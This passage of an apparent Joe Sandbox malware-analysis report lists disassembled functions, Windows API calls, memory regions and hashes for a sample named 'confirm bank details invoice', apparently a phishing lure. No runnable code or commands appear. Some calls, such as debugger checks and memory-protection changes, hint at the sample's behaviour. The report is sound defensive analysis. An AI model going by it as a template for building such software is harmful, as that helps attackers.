                    • Instruction Fuzzy Hash: 7EF158756043019FC710DF25C481B6AB7E5FF88318F10892EF99A9B392D778E909CB86
                    Function 00474FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00475022
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004750CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconNotifyShell__memset
                    • String ID:
                    • API String ID: 928536360-0
                    • Opcode ID: 3af740ca5768d2f8a6f599c3980deec6c5d6f2570e87fa6358388903f04c35bf
                    • Instruction ID: 73678f12bac10465f9fcec6f0881f336dc2467bdbbcf5a8a20fa561aa7bfab9f
                    • Opcode Fuzzy Hash: 3af740ca5768d2f8a6f599c3980deec6c5d6f2570e87fa6358388903f04c35bf
                    • Instruction Fuzzy Hash: B1317AB0504B408FD721DF25D8456DBBBE4EB58309F00492EE59E86340E7B5A948CB9A
                    Function 0049395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00493973
                      • Part of subcall function 004981C2: __NMSG_WRITE.LIBCMT ref: 004981E9
                      • Part of subcall function 004981C2: __NMSG_WRITE.LIBCMT ref: 004981F3
                    • __NMSG_WRITE.LIBCMT ref: 0049397A
                      • Part of subcall function 0049821F: GetModuleFileNameW.KERNEL32(00000000,00530312,00000104,00000000,00000001,00000000), ref: 004982B1
                      • Part of subcall function 0049821F: ___crtMessageBoxW.LIBCMT ref: 0049835F
                      • Part of subcall function 00491145: ___crtCorExitProcess.LIBCMT ref: 0049114B
                      • Part of subcall function 00491145: ExitProcess.KERNEL32 ref: 00491154
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000001,00000000,?,?,0048F507,?,0000000E), ref: 0049399F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 9c53bae8eb8a3ed1cd21f43a073767a483805fad81c34991247f2b02b9a17abc
                    • Instruction ID: f4be4d83cd270d4f30361f5ebb0651628e9f14cf0650969aee1c7619f7ca907f
                    • Opcode Fuzzy Hash: 9c53bae8eb8a3ed1cd21f43a073767a483805fad81c34991247f2b02b9a17abc
                    • Instruction Fuzzy Hash: 670196B22453019AEE213F66DC56B2B2B489B83B69B21003FF505973D1DBBCDD01866D
                    Function 004BC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004BC385,?,?,?,?,?,00000004), ref: 004BC6F2
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004BC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004BC708
                    • CloseHandle.KERNEL32(00000000,?,004BC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004BC70F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: 61a2d7482c568c433baf7f23f34e74242922a687afa1195b605ec0a5d1315c19
                    • Instruction ID: c0aa398b5482bfc2dbdda50ce0a517e75dde58cc463131d737260d9bcee4012e
                    • Opcode Fuzzy Hash: 61a2d7482c568c433baf7f23f34e74242922a687afa1195b605ec0a5d1315c19
                    • Instruction Fuzzy Hash: 41E08632540214B7D7211B54AC4DFDE7B19AB05764F104120FB14690E097B12531C79C
                    Function 004BBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004BBB72
                      • Part of subcall function 00491C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00497A85), ref: 00491CB1
                      • Part of subcall function 00491C9D: GetLastError.KERNEL32(00000000,?,00497A85), ref: 00491CC3
                    • _free.LIBCMT ref: 004BBB83
                    • _free.LIBCMT ref: 004BBB95
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                    • Instruction ID: 81794d8c19092dcb03ae5eee3b458eeb713f78711d03ad2ce8064dd0831bf2ae
                    • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                    • Instruction Fuzzy Hash: 16E012A164574246DE24697A6E44EF717CC8F04355714082FB459E7646CF6CF84085FC
                    Function 00472322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004722A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004724F1), ref: 00472303
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004725A1
                    • CoInitialize.OLE32(00000000), ref: 00472618
                    • CloseHandle.KERNEL32(00000000), ref: 004E503A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                    • String ID:
                    • API String ID: 3815369404-0
                    • Opcode ID: 3157057a1c5d21fc813eab62b2a4ec5abea133501bd1de987b16da107b348455
                    • Instruction ID: c97f90c914816398bce9273579d3458820b76612c594a6815df823708a010a51
                    • Opcode Fuzzy Hash: 3157057a1c5d21fc813eab62b2a4ec5abea133501bd1de987b16da107b348455
                    • Instruction Fuzzy Hash: FD71B0B8901A818BC704EF7BE99049ABBE4FB79344780852EE509C7771CB744418EF2C
                    Function 004D0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                    Download Yara Rule
                    APIs
                    • _strcat.LIBCMT ref: 004D08FD
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • _wcscpy.LIBCMT ref: 004D098C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __itow__swprintf_strcat_wcscpy
                    • String ID:
                    • API String ID: 1012013722-0
                    • Opcode ID: 51272c1e060d210c7b232895f8facea4b516b276d31a9e311de05d5e008a9b1f
                    • Instruction ID: a6205440b4ed2c7d9162f7088cee7425698fbca334bf2ed52e805104bf187c84
                    • Opcode Fuzzy Hash: 51272c1e060d210c7b232895f8facea4b516b276d31a9e311de05d5e008a9b1f
                    • Instruction Fuzzy Hash: 51913C34A00605DFCB18DF19C591AA9B7E5FF59314B55806FE81A8F352DB38ED01CB89
                    Function 00473A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • IsThemeActive.UXTHEME ref: 00473A73
                      • Part of subcall function 00491405: __lock.LIBCMT ref: 0049140B
                      • Part of subcall function 00473ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00473AF3
                      • Part of subcall function 00473ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00473B08
                      • Part of subcall function 00473D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00473AA3,?), ref: 00473D45
                      • Part of subcall function 00473D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00473AA3,?), ref: 00473D57
                      • Part of subcall function 00473D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00531148,00531130,?,?,?,?,00473AA3,?), ref: 00473DC8
                      • Part of subcall function 00473D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00473AA3,?), ref: 00473E48
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00473AB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 924797094-0
                    • Opcode ID: d69f7dffbeec2ea1bc1a9a70379b507f69d776f9caf7cb388345da2f56ba50f1
                    • Instruction ID: fdf5c6aa5999a192926b8283ae90c452df488c5d19dde86a6167becc1985b101
                    • Opcode Fuzzy Hash: d69f7dffbeec2ea1bc1a9a70379b507f69d776f9caf7cb388345da2f56ba50f1
                    • Instruction Fuzzy Hash: A811AE719043419BC304EF2AED4595EBBE9EBA4310F00891FF484872B1DBB49559DB9A
                    Function 0049E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___lock_fhandle.LIBCMT ref: 0049EA29
                    • __close_nolock.LIBCMT ref: 0049EA42
                      • Part of subcall function 00497BDA: __getptd_noexit.LIBCMT ref: 00497BDA
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                    • String ID:
                    • API String ID: 1046115767-0
                    • Opcode ID: 3ba2e6710614bea7b5dfc6181c7a357b315bfc0fd706527dafc002307fbeeb8d
                    • Instruction ID: 7dbe70f9dbfa899d43b5d36ea1568a22da46d85ffa2e18d5007443fe399cd764
                    • Opcode Fuzzy Hash: 3ba2e6710614bea7b5dfc6181c7a357b315bfc0fd706527dafc002307fbeeb8d
                    • Instruction Fuzzy Hash: 7911C2728056108ADF11FFA6C8423193E606F82339F26436AE4201F2F3CBBC9C0197AD
                    Function 0048F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0049395C: __FF_MSGBANNER.LIBCMT ref: 00493973
                      • Part of subcall function 0049395C: __NMSG_WRITE.LIBCMT ref: 0049397A
                      • Part of subcall function 0049395C: RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000001,00000000,?,?,0048F507,?,0000000E), ref: 0049399F
                    • std::exception::exception.LIBCMT ref: 0048F51E
                    • __CxxThrowException@8.LIBCMT ref: 0048F533
                      • Part of subcall function 00496805: RaiseException.KERNEL32(?,?,0000000E,00526A30,?,?,?,0048F538,0000000E,00526A30,?,00000001), ref: 00496856
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: 8e936113f2c07f46a098632562d3407892fa113bc1d8818ebcd093a0670bc72a
                    • Instruction ID: 7d701db73fd18e409095f7afa064ac0503db4fecd804c5bcf02aca373ee91c2b
                    • Opcode Fuzzy Hash: 8e936113f2c07f46a098632562d3407892fa113bc1d8818ebcd093a0670bc72a
                    • Instruction Fuzzy Hash: 8AF0A93150411EA7DB04BF99D8019EF7B989F05758F60443BF90491181DBB8A74497AD
                    Function 004935E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • __lock_file.LIBCMT ref: 00493629
                      • Part of subcall function 00494E1C: __lock.LIBCMT ref: 00494E3F
                    • __fclose_nolock.LIBCMT ref: 00493634
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: ab36481ec9d03a228935a8a32f197d25ac6e75787020d9a26f16955a68feb848
                    • Instruction ID: 6f3dc99e293e1a22c8b39ca1351d1c565ae8de1ea024a596de657acaed83d357
                    • Opcode Fuzzy Hash: ab36481ec9d03a228935a8a32f197d25ac6e75787020d9a26f16955a68feb848
                    • Instruction Fuzzy Hash: 97F09632801214AADF21AF668802B5F7EA06F42739F26812FE411AB2C1C77C8E019B5D
                    Function 0047E8A0 Relevance: 1.7, APIs: 1, Instructions: 194windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E959
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessagePeek
                    • String ID:
                    • API String ID: 2222842502-0
                    • Opcode ID: 82dc7a4e1bee50206662311e7e1955be1b002a20850f12935504502d1e867d89
                    • Instruction ID: f9ee8ac093400c504bf847f5281c57a8c991a5294cbacc96ebe39b082798914e
                    • Opcode Fuzzy Hash: 82dc7a4e1bee50206662311e7e1955be1b002a20850f12935504502d1e867d89
                    • Instruction Fuzzy Hash: 8271BB709047C09FEB26CF26C4447AB7BD0BB55308F084ABFD8895B361D3799889CB4A
                    Function 01340D98 Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 01340608: GetFileAttributesW.KERNELBASE(?), ref: 01340613
                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01340EEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AttributesCreateDirectoryFile
                    • String ID:
                    • API String ID: 3401506121-0
                    • Opcode ID: b02d5ba8c92bde3a8e172049db20f861a4cc2738b49edf6531c34fd173c8725e
                    • Instruction ID: 74dd5071a9bbc1395568a1a239c5ad94a1583bb8493f5b830cfec0848441843c
                    • Opcode Fuzzy Hash: b02d5ba8c92bde3a8e172049db20f861a4cc2738b49edf6531c34fd173c8725e
                    • Instruction Fuzzy Hash: 60517831A1120997EF14EFA4C844BEFB379EF58700F108569B609F7290EB799B44CB65
                    Function 00492957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • __flush.LIBCMT ref: 00492A0B
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __flush__getptd_noexit
                    • String ID:
                    • API String ID: 4101623367-0
                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                    • Instruction ID: 32fa037e0723e614d1586568b5dc3c5c11bd5285bcf66127adcbf6d1209be768
                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                    • Instruction Fuzzy Hash: 9C419571700706BFDF288EA9CA8056F7FA6AF45360F24853FE855C7240D6B8DD458B48
                    Function 0048ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: d32e2b8dd2a3ed343dae3082cc6817f8454443326cb7535949d6ff07679ab470
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 9131E870A00106DBC718EF5AC48096EFBE6FF49340B648AA6E409CB355DB34EDC5CB85
                    Function 004D040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: c36d41e103a3c3a0393b85176115f7a9fbaad2162c0ab082b1602ce8cc59318b
                    • Instruction ID: 4204f28bba0ea79ce15957b9ba8e8da74b83a855a7f123b3e3b716a1d350fd53
                    • Opcode Fuzzy Hash: c36d41e103a3c3a0393b85176115f7a9fbaad2162c0ab082b1602ce8cc59318b
                    • Instruction Fuzzy Hash: 7A315E75104524DFCB01EF11D0A1BAE7BB1FF49324F10885BEA951B386D778A906CF9A
                    Function 004E9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 2e2020740287af48e2c32a7d0be254f601cd52c645ba99d057beda5a6996e33d
                    • Instruction ID: e2b3177124a91f6e0044209f9c648e723f9ee23f93eccfce969d198317eddde1
                    • Opcode Fuzzy Hash: 2e2020740287af48e2c32a7d0be254f601cd52c645ba99d057beda5a6996e33d
                    • Instruction Fuzzy Hash: 3B415E705046518FDB24DF19C444B1ABBE0BF45308F19899EE99A4B362C37AFC46CF56
                    Function 004741A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00474214: FreeLibrary.KERNEL32(00000000,?), ref: 00474247
                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004739FE,?,00000001), ref: 004741DB
                      • Part of subcall function 00474291: FreeLibrary.KERNEL32(00000000), ref: 004742C4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Library$Free$Load
                    • String ID:
                    • API String ID: 2391024519-0
                    • Opcode ID: 1e1a2d091dc26341e014d3b0bb4074d115c4262e2fa88ac9ae34878422b7cc23
                    • Instruction ID: 1c5b76f00367e745a151bde2a5e0cdc646d65fc54180db8612c04e222875775b
                    • Opcode Fuzzy Hash: 1e1a2d091dc26341e014d3b0bb4074d115c4262e2fa88ac9ae34878422b7cc23
                    • Instruction Fuzzy Hash: B2119831700205AADF10AB75DC06BFE77A99F80748F10C46EB55AA61C2DB789A119B68
                    Function 004E9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
